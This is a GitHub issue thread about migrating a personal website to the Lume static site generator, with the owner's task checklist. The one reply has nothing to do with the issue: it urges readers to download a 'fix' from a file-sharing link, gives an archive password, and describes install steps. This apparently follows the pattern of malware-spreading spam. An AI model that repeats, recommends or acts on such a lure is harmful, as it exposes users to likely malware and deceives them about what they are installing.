### ISSUE TITLE
Migrate to Lume

### ISSUE THREAD

**Issue by akimon658** [akimon658/akimon658.github.io#77]
- [x] Multi language support
- [x] List page
- [x] Link to external articles
- [ ] Configure Renovate
- [x] Set up GitHub Actions
- [x] Update README.md
- [x] Update privacy policy

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
